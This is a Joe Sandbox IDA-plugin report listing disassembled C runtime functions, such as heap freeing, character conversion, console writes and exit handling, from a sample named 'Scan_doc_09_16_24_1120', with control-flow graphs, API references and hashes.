                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 0083616D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836540
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836562
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836577
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836582
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365A4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365B7
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365C5
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008365D0
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836608
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083660F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083662C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836644
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                                          • Opcode ID: f4d8af4bbb415d95cfac727ffb5628938c42b6f05f1da7c2a5f5b326fc17e537
                                                                                                                                                                                                                                                                          • Instruction ID: 0aa58a05655ed925fe02f84b9e736167698ad594127201e28a52f4ed87c7aad7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4d8af4bbb415d95cfac727ffb5628938c42b6f05f1da7c2a5f5b326fc17e537
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA315E71600605AFDB60AA7ED805B56B3E8FFC0350F149439E159D7191EF38EC608BA1
                                                                                                                                                                                                                                                                          Function 00834330 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 138 834330-834341 139 834343-83434c call 834869 138->139 140 83434d-8343d8 call 834869 * 9 call 8341f6 call 834246 138->140 139->140
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834344
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834350
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083435B
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834366
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834371
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083437C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834387
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834392
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083439D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008343AB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: abf1090b3d4ffdc285116b74a67642fe4199695efe55e971c96ccfd8c34c5dea
                                                                                                                                                                                                                                                                          • Instruction ID: 081b6ebf7a0f0d9085f4fcdad70ca0bab1f0f6e5b754186e992022be0a1b7514
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abf1090b3d4ffdc285116b74a67642fe4199695efe55e971c96ccfd8c34c5dea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD11A476600148EFCB41EF9AD842CD97BA5FF84750F0151A2BA188F262DA39EE519F81
                                                                                                                                                                                                                                                                          Function 00837AB4 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 165 837ab4-837acd 166 837ae3-837ae8 165->166 167 837acf-837adf call 8382cc 165->167 169 837af5-837b19 MultiByteToWideChar 166->169 170 837aea-837af2 166->170 167->166 174 837ae1 167->174 172 837b1f-837b2b 169->172 173 837cac-837cbf call 83123a 169->173 170->169 175 837b7f 172->175 176 837b2d-837b3e 172->176 174->166 178 837b81-837b83 175->178 179 837b40-837b4f call 83ac20 176->179 180 837b5d-837b63 176->180 182 837ca1 178->182 183 837b89-837b9c MultiByteToWideChar 178->183 179->182 192 837b55-837b5b 179->192 185 837b64 call 8362ff 180->185 187 837ca3-837caa call 83646a 182->187 183->182 186 837ba2-837bbd call 835a15 183->186 189 837b69-837b6e 185->189 186->182 197 837bc3-837bca 186->197 187->173 189->182 193 837b74 189->193 194 837b7a-837b7d 192->194 193->194 194->178 198 837c04-837c10 197->198 199 837bcc-837bd1 197->199 201 837c12-837c23 198->201 202 837c5c 198->202 199->187 200 837bd7-837bd9 199->200 200->182 205 837bdf-837bf9 call 835a15 200->205 203 837c25-837c34 call 83ac20 201->203 204 837c3e-837c44 201->204 206 837c5e-837c60 202->206 211 837c9a-837ca0 call 83646a 203->211 217 837c36-837c3c 203->217 208 837c45 call 8362ff 204->208 205->187 220 837bff 205->220 210 837c62-837c7b call 835a15 206->210 206->211 214 837c4a-837c4f 208->214 210->211 223 837c7d-837c84 210->223 211->182 214->211 219 837c51 214->219 222 837c57-837c5a 217->222 219->222 220->182 222->206 224 837cc0-837cc6 223->224 225 837c86-837c87 223->225 226 837c88-837c98 WideCharToMultiByte 224->226 225->226 226->211 227 837cc8-837ccf call 83646a 226->227 227->187
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,008354C8,00000000,?,?,?,00837D05,?,?,00000100), ref: 00837B0E
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00837B46
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00837D05,?,?,00000100,5EFC4D8B,?,?), ref: 00837B94
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00837C2B
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00837C8E
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00837C9B
                                                                                                                                                                                                                                                                            • Part of subcall function 008362FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00837E5B,?,00000000,?,0083686F,?,00000004,00000000,?,?,?,00833BCD), ref: 00836331
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00837CA4
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00837CC9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2f2892da1b8f0fca2153b5d34cb905c6ce3789b5575e9915ed1491057ad444eb
                                                                                                                                                                                                                                                                          • Instruction ID: 00ffee6a1fce967d9c324a504a1959cbe66cc7a8eea1c11d80592e4dfa075973
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f2892da1b8f0fca2153b5d34cb905c6ce3789b5575e9915ed1491057ad444eb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B351CDB2614216ABEB358F68CC81EAF77AAFBC4764F154628FC04D6140EB34DC41D6E0
                                                                                                                                                                                                                                                                          Function 00838417 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 230 838417-838474 GetConsoleCP 231 8385b7-8385c9 call 83123a 230->231 232 83847a-838496 230->232 233 8384b1-8384c2 call 836052 232->233 234 838498-8384af 232->234 241 8384c4-8384c7 233->241 242 8384e8-8384ea 233->242 236 8384eb-8384fa call 8372b7 234->236 236->231 246 838500-838520 WideCharToMultiByte 236->246 244 83858e-8385ad 241->244 245 8384cd-8384df call 8372b7 241->245 242->236 244->231 245->231 253 8384e5-8384e6 245->253 246->231 248 838526-83853c WriteFile 246->248 249 8385af-8385b5 GetLastError 248->249 250 83853e-83854f 248->250 249->231 250->231 252 838551-838555 250->252 254 838583-838586 252->254 255 838557-838575 WriteFile 252->255 253->246 254->232 257 83858c 254->257 255->249 256 838577-83857b 255->256 256->231 258 83857d-838580 256->258 257->231 258->254
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00838B8C,?,00000000,?,00000000,00000000), ref: 00838459
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 008384D4
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 008384EF
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00838515
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00838B8C,00000000,?,?,?,?,?,?,?,?,?,00838B8C,?), ref: 00838534
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00838B8C,00000000,?,?,?,?,?,?,?,?,?,00838B8C,?), ref: 0083856D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5f8e833dba3ff44d36ff0f9804f692abaabfeeb7f3502aaffa53bfb87006ea9f
                                                                                                                                                                                                                                                                          • Instruction ID: 73cc0d028cac0d242b4e5fff9b0ddf7c9501c986d7afd7dd200d961a5de153d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8e833dba3ff44d36ff0f9804f692abaabfeeb7f3502aaffa53bfb87006ea9f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D35183B1A00249DFDB11CFA8D885AEEBBF4FF99300F14451AF555E7291DB309941CBA1
                                                                                                                                                                                                                                                                          Function 00831E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 259 831e00-831e51 call 83ac80 call 831dc0 call 832377 266 831e53-831e65 259->266 267 831ead-831eb0 259->267 269 831ed0-831ed9 266->269 270 831e67-831e7e 266->270 268 831eb2-831ebf call 832360 267->268 267->269 274 831ec4-831ecd call 831dc0 268->274 272 831e80-831e8e call 832300 270->272 273 831e94 270->273 281 831e90 272->281 282 831ea4-831eab 272->282 276 831e97-831e9c 273->276 274->269 276->270 279 831e9e-831ea0 276->279 279->269 283 831ea2 279->283 284 831e92 281->284 285 831eda-831ee3 281->285 282->274 283->274 284->276 286 831ee5-831eec 285->286 287 831f1d-831f2d call 832340 285->287 286->287 289 831eee-831efd call 83aac0 286->289 292 831f41-831f5d call 831dc0 call 832320 287->292 293 831f2f-831f3e call 832360 287->293 297 831f1a 289->297 298 831eff-831f17 289->298 293->292 297->287 298->297
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00831E37
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00831E3F
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00831EC8
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00831EF3
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00831F48
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: 865b809b69a787e24d4bba21295489ac82bae7fda2c58a2a5c9fcc4767e34bad
                                                                                                                                                                                                                                                                          • Instruction ID: 5be87391ab576bd93cf78a7ba508323e87acc18f2ab6230de1cde40a982068ff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 865b809b69a787e24d4bba21295489ac82bae7fda2c58a2a5c9fcc4767e34bad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5241B034A002089FCF10DF68C889A9EBBB5FF85768F148455EC15DB3A2D776AA41CBD1
                                                                                                                                                                                                                                                                          Function 0083621B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 305 83621b-836226 306 8362fc-8362fe 305->306 307 83622c-8362f9 call 8361df * 5 call 834869 * 3 call 8361df * 5 call 834869 * 4 305->307 307->306
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 008361DF: _free.LIBCMT ref: 00836208
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836269
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836274
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083627F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362D3
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362DE
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362E9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362F4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                                          • Instruction ID: b388512c5961e2e0732e7916343e34378041a996d3fbc5f97e70b38b0617a172
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98114271540714BAD520B779CC17FDBB79CFF80700F408825B69AE6093EAA9BA154AD2
                                                                                                                                                                                                                                                                          Function 008323D1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 342 8323d1-8323d8 343 8323da-8323dc 342->343 344 8323dd-8323f8 GetLastError call 8326a4 342->344 347 832411-832413 344->347 348 8323fa-8323fc 344->348 349 832457-832462 SetLastError 347->349 348->349 350 8323fe-83240f call 8326df 348->350 350->347 353 832415-832425 call 833f67 350->353 356 832427-832437 call 8326df 353->356 357 832439-832449 call 8326df 353->357 356->357 362 83244b-83244d 356->362 363 83244f-832456 call 833ec5 357->363 362->363 363->349
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,008323C8,0083209F,00831AFC), ref: 008323DF
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008323ED
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00832406
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,008323C8,0083209F,00831AFC), ref: 00832458
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3bd6d0079b75d598d820bf059bdfbc0509095f1a8eb1bfee812287dcbaf814fb
                                                                                                                                                                                                                                                                          • Instruction ID: 075ca85eacb9772eaf53f968c5699070960a2084d2d7301186c9152dc3e07ef3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bd6d0079b75d598d820bf059bdfbc0509095f1a8eb1bfee812287dcbaf814fb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E901D436108B195EAA2467BCAC8A6272758FFD27B4F200339F620C11E4EF514C8192C9
                                                                                                                                                                                                                                                                          Function 00834424 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 366 834424-834438 GetLastError 367 834446-83444b 366->367 368 83443a-834444 call 835904 366->368 370 83444d call 83480c 367->370 368->367 375 83448f-83449a SetLastError 368->375 372 834452-834458 370->372 373 834463-834471 call 83595a 372->373 374 83445a 372->374 381 834473-834474 373->381 382 834476-83448d call 834296 call 834869 373->382 376 83445b-834461 call 834869 374->376 383 83449b-8344a7 SetLastError call 833f24 376->383 381->376 382->375 382->383
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00836D69,?,?,?,008404C8,0000002C,00833F34,00000016,0083209F,00831AFC), ref: 00834428
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083445B
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834483
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00834490
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0083449C
                                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 008344A2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5ca604690ab11f0b7b721975792ea5569a7c315ea391c55db90765299e3b77d3
                                                                                                                                                                                                                                                                          • Instruction ID: 9f3cfa996ca4fb93873d12eb1dcde052de25f09cf9bcce31bd5c10c3692f14fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ca604690ab11f0b7b721975792ea5569a7c315ea391c55db90765299e3b77d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0C835501B80A6C6167738BC1AB2B266AFFC1771F245534FA38E2191EF29A94241E6
                                                                                                                                                                                                                                                                          Function 008336FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 390 8336fc-833724 GetModuleHandleExW 391 833726-833739 GetProcAddress 390->391 392 833749-83374d 390->392 393 83373b-833746 391->393 394 833748 391->394 395 833758-833765 call 83123a 392->395 396 83374f-833752 FreeLibrary 392->396 393->394 394->392 396->395
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008336AD,?,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002), ref: 0083371C
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0083372F
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,008336AD,?,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002,00000000), ref: 00833752
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
